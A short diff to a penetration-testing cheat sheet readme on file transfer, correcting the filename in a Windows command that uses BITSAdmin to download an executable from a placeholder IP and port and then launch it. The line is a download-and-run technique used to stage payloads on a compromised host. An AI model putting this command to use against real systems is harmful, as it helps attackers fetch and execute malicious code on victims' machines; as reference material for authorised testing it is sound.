curtishoughton/Penetration-Testing-Cheat-Sheet/File-Transfer/readme.md

 BITSAdmin can also be used to transfer files to a host with the following command:

-`cmd.exe /c "bitsadmin /transfer myjob /download /priority high http://<ip address>:<port>/FileToTransfer.exe C:\Path\ExeOutputName.exe & start acrev.exe"`
+`cmd.exe /c "bitsadmin /transfer myjob /download /priority high http://<ip address>:<port>/FileToTransfer.exe C:\Path\ExeOutputName.exe & start ExeOutputName.exe"`

 ## Linux